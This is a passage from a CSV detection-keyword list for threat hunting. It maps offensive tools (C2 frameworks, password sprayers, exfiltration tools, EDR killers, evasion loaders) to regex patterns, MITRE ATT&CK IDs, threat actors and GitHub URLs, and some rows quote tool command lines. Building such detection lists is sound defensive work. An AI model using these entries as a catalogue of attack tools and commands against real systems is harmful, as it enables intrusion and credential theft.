"*dafa76f08d48da880f27b5a3c65a9e88b45f1ec7a6790759595cf9c3745c1e48*",".{0,1000}dafa76f08d48da880f27b5a3c65a9e88b45f1ec7a6790759595cf9c3745c1e48.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40102" "*DAFE686A-461B-402B-BBD7-2A2F4C87C773*",".{0,1000}DAFE686A\-461B\-402B\-BBD7\-2A2F4C87C773.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40103" "*daff98d2dd945ec0f5d8ef476de48e57074416a50389639d01aa54444d2cfb44*",".{0,1000}daff98d2dd945ec0f5d8ef476de48e57074416a50389639d01aa54444d2cfb44.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","0","#filehash","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","40104" "*dafthack/DomainPasswordSpray*",".{0,1000}dafthack\/DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","40105" "*dafthack/GraphRunner*",".{0,1000}dafthack\/GraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","1","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","40106" 
"*dafthack/HostRecon*",".{0,1000}dafthack\/HostRecon.{0,1000}","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Discovery","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","N/A","5","446","120","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z","40107" "*dafthack/MailSniper*",".{0,1000}dafthack\/MailSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","40108" "*dafthack/MFASweep*",".{0,1000}dafthack\/MFASweep.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/dafthack/MFASweep","1","1","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","40109" "*dafthack/RDPSpray*",".{0,1000}dafthack\/RDPSpray.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","40110" "*dahvid.schloss@echeloncyber.com*",".{0,1000}dahvid\.schloss\@echeloncyber\.com.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","#email","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","40111" "*dahvidschloss/PILOT*",".{0,1000}dahvidschloss\/PILOT.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","40112" 
"*DallasFR/Cobalt-Clip*",".{0,1000}DallasFR\/Cobalt\-Clip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","40113" "*DallasFR/WinShellcode*",".{0,1000}DallasFR\/WinShellcode.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - 
TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40114" "*DAMP-master.zip",".{0,1000}DAMP\-master\.zip","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","N/A","10","4","378","79","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z","40122" "*DancingRightToLeft.py*",".{0,1000}DancingRightToLeft\.py.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","40123" "*danielbohannon/Invoke-Obfuscation*",".{0,1000}danielbohannon\/Invoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","40124" "*danielmiessler/SecLists*",".{0,1000}danielmiessler\/SecLists.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40125" 
"*danielmiessler/SecLists.git*",".{0,1000}danielmiessler\/SecLists\.git.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40126" "*danilovazb/BabyShark*",".{0,1000}danilovazb\/BabyShark.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","40127" "*DanMcInerney/Empire*",".{0,1000}DanMcInerney\/Empire.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","40128" "*DanMcInerney/icebreaker*",".{0,1000}DanMcInerney\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","40129" 
"*DanMcInerney/net-creds*",".{0,1000}DanMcInerney\/net\-creds.{0,1000}","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","10","1746","442","2023-11-02T10:46:03Z","2015-01-07T18:47:46Z","40130" "*DanMcInerney/theHarvester*",".{0,1000}DanMcInerney\/theHarvester.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","40131" "*danti1988/adcshunter*",".{0,1000}danti1988\/adcshunter.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","40132" "*daphne-main.zip*",".{0,1000}daphne\-main\.zip.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","40133" "*daphne-x64 * pid=*",".{0,1000}daphne\-x64\s.{0,1000}\spid\=.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense 
Evasion","https://github.com/codewhitesec/daphne","1","0","N/A","N/A","8","1","17","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z","40134" "*dark24zz36xm4y2phwe7yvnkkkkhxionhfrwp67awpb3r3bdcneivoqd.onion*",".{0,1000}dark24zz36xm4y2phwe7yvnkkkkhxionhfrwp67awpb3r3bdcneivoqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40136" "*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o *.exe*",".{0,1000}darkarmour\s\-f\s.{0,1000}\.exe\s\-\-encrypt\sxor\s\-\-jmp\s\-\-loop\s7\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40137" "*darkarmour.py*",".{0,1000}darkarmour\.py.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","40138" "*darkarmour-master*",".{0,1000}darkarmour\-master.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memory without a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","40139" 
"*DarkCoderSc/SharpShellPipe*",".{0,1000}DarkCoderSc\/SharpShellPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","40140" "*darkhotel backdoor*",".{0,1000}darkhotel\sbackdoor.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40141" "*DarkHotel C2*",".{0,1000}DarkHotel\sC2.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40142" "*darkhotel data exfil server*",".{0,1000}darkhotel\sdata\sexfil\sserver.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40143" 
"*darkhotel_headers*",".{0,1000}darkhotel_headers.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40144" "*DarkLoadLibrary-maser*",".{0,1000}DarkLoadLibrary\-maser.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","N/A","10","10","1133","207","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z","40145" "*darkr4y/geacon*",".{0,1000}darkr4y\/geacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","40146" "*DarkRCovery.exe*",".{0,1000}DarkRCovery\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40147" "*DarkRCovery.exe*",".{0,1000}DarkRCovery\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","40148" "*Darkside.exe -p*",".{0,1000}Darkside\.exe\s\-p.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense 
Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","40149" "*Darkside-master.zip*",".{0,1000}Darkside\-master\.zip.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","40150" "*darkweb2017-top100.txt*",".{0,1000}darkweb2017\-top100\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","40151" "*DarkWidow-main*",".{0,1000}DarkWidow\-main.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","40152" "*das add -db dbname masscan *",".{0,1000}das\sadd\s\-db\sdbname\smasscan\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black 
Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40153" "*das add -db dbname rustscan *",".{0,1000}das\sadd\s\-db\sdbname\srustscan\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40154" "*das report -hosts 192.168.1.0/24 -oA report2*",".{0,1000}das\sreport\s\-hosts\s192\.168\.1\.0\/24\s\-oA\sreport2.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40155" "*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel*",".{0,1000}das\sscan\s\-db\sdbname\s\-hosts\sall\s\-oA\sreport1\s\-nmap\s\'\-Pn\s\-sVC\s\-O\'\s\-parallel.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40156" "*das scan -db dbname -ports 22*80*443*445 -show*",".{0,1000}das\sscan\s\-db\sdbname\s\-ports\s22.{0,1000}80.{0,1000}443.{0,1000}445\s\-show.{0,1000}","offensive_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40157" "*dashlane2john.py*",".{0,1000}dashlane2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","40159" "*Data Name=""ServiceName"">chopper*",".{0,1000}Data\sName\=\""ServiceName\""\>chopper\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#servicename","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","40160" "*Data Name=""ServiceName"">final_seg*",".{0,1000}Data\sName\=\""ServiceName\""\>final_seg\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#servicename","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","40161" "*Data Name=""ServiceName"">let me in*",".{0,1000}Data\sName\=\""ServiceName\""\>let\sme\sin\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - 
T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#servicename","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","40162" "*Data Name=""ServiceName"">procexp*",".{0,1000}Data\sName\=\""ServiceName\""\>procexp\<\/Data\>.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privileged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Persistence","https://github.com/trustedsec/The_Shelf","1","0","N/A","ServiceName","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","40163" "*data/implant/*/host.ps1*",".{0,1000}data\/implant\/.{0,1000}\/host\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","40166" "*data/ipwn*",".{0,1000}data\/ipwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
